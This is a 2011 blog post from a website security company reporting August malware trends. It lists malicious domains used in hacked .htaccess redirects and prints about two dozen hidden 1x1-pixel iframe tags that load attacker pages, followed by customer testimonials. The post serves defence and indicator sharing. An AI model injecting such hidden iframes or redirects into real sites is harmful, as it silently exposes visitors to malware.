Research

Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il

September 13, 2011 By

We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner.

 
For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability.

If your site is currently compromised with malware or spam and you need help, sign up with us here: http://sucuri.net/signup. We will clean your site and get it off from Google’s blacklist.

.htaccess redirections

We are seeing many sites with their .htaccess hacked. It redirects their users to some Russian and Polish domains:

http://softwareid.ru/zisec/index.php
http://breakingbad.osa.pl/
http://privacyyour.ru/xfast/index.php
http://activationsoftware.ru/turbom/index.php

http://distributioncorporate.ru/kloac/index.php
http://dgsdfhsdfh.osa.pl
http://now-protect.ru/accaunt/index.php
http://yourprivacy.ru/product/index.php
http://internet-safeness.ru/team/index.php

http://safenesscontent.ru/s4one/index.php

Malicious iframes

We are seeing many malicious iframes, specially from free domains (.cu.cc, .co.cc, etc). Also from some domains faking to be from google, like toolbarqueries-google.info, counter-google.com, counter-wordpress.com, etc:

http://toolbarqueries-google.info
http://whatwesave.cu.cc
http://bkmb.net/
http://gertalo8olw.c0m.li/forum.php?tp=134539292
http://dvotjtnc.co.tv/i.php?go=1
http://matreshka5.cx.cc/index.php?tp=38967d9a9d6df9e3
http://iframeshop.net/sti.php?id=123444
http://linkdock.com/content.php
http://sockscape.gv.vg/showthread.php?t=50170030

http://sommerandengelhart.com/genall.cgi

Examples of iframes:

<iframe src="http://prettyrosseande.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://bastalevarrga.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://bastalevarrga.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://fzwbwwvft.co.tv/i.php?go=1" width="1" height="1"></iframe>
<iframe src="http://narmnqlahb.co.tv/i.php?go=1" width="3" height="3"></iframe>
<iframe src=’http://rynothedyno.gv.vg/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://fwzlwke.co.tv/?go=1" width="1" height="1">
<iframe src=’http://hcirfiwcsmo.cu.cc/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sandradohn.cu.cc/showthread.php?t=10170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sail4kids.cu.cc/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://bagsbybetty.gv.vg/showthread.php?t=40170030′ width=’1′ height=’1′ frameborder=’0′ >

<iframe src=’http://vkcomics.ka.hn/showthread.php?t=50170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sincitycash.gv.vg/showthread.php?t=50170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://ycnnfnw.co.tv/?go=1" width="1" height="1">
<iframe src=’http://digitalday.ka.hn/showthread.php?t=10170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://darcy4h.cu.cc/showthread.php?t=80170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://hipoteca049.gv.vg/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://lakotasales.cu.cc/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://topbeatech.ka.hn/showthread.php?t=30170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://change1life.gv.vg/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://mindsvision.ka.hn/showthread.php?t=70170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://ellrcsh.co.tv/?go=1" width="1" height="1">
<iframe src=’http://myclubbonus.cu.cc/showthread.php?t=60170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://indobatiks.cu.cc/showthread.php?t=40170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe frameborder=0 height=1 width=1 scrolling=no src="http://bkmb.net/"..

 
And many more.. Those are just some samples. If you think your site might be compromised, scan it on our scanner: http://sitecheck.sucuri.net

 

Posted In blacklisted, hacked, hacked, htaccess, iframes Tagged , , , ,

Testimonials

loading Loading

    • Let's be honest: the web can be a scary place sometimes. Having done many a WordPress malware cleanup in my day, I've found Sucuri to do a better job than I ever hoped I could do. Not only are they thorough, but they're fast as heck and affordable to boot. You don't just walk into a bad situation without some protection. Sucuri *is* that protection.

      —Andrew Norcross, Senior WordPress Developer @ BlueGlass Interactive, Owner @Reaktiv Studios, WordCamp Speaker

      Reaktiv Studios

    • We partnered with Sucuri for our WordPress migration and dehacking services as their capabilities are significantly more comprehensive than anything we’ve seen in the industry.

      —Brian Clark, CEO of Coppyblogger Media

      Websynthesis

    • I like to think I know security, but there is only one company I trust when it comes to the security of my websites, that company is Sucuri. They are, in my opinion, hands-down the leader in web-malware protection and cleanup services. Trust the experts, hire these fools!

      —Brad Williams, Co-Founder WebDevStudios, Co-Author Professional WordPress Series

      WebDevStudios

    • When you’re talking about protection for your WordPress site and the things most important to you — your content — you want to trust the experts. There’s really no better choice than the team at Sucuri.

      —Cory J. Miller – Founder / CEO of iThemes.com

      iThemes

    • Before Sucuri we didn’t know that someone was hacked until they told us. (Or actually, when Google blocked their site!) Now we find and fix problems before they even know what’s happening. It’s a Godsend, it’s as simple as possible, and it’s so affordable that quite frankly it’s irresponsible to not use them!

      —Jason Cohen, CEO of WP Engine

      WP Engine

    • As the owner of ClickHOST.com, a shared web hosting company, we are always fighting malware and spam. Recently we partnered with Sucuri and now all our accounts are monitored. I love this product! It not only protects our customers from malware, but these guys will fix a hack in 4 hours.

      —Carel Bekker, Owner/President of ClickHOST.com

      ClickHOST

    • Sucuri is my go to service for web based security and are the group that I recommend, exclusively, to my clients and readers, in particular WordPress users.  They are affordable, they work fast and they get the job done – as a bonus, they’re a fun group to work with!

      —Lisa Sabin-Wilson – Author: WordPress For Dummies; Designer, Co-Founder Allure Themes, Founder E. Webscapes

      E. Webscapes

    • Though I believe my sites are secure, it would be inexcusable for me not to use Sucuri’s service and be absolutely sure around the clock.

      —Scott Kingsley Clark, Lead Developer, Pods Framework

      Pods

Scan your website FOR FREE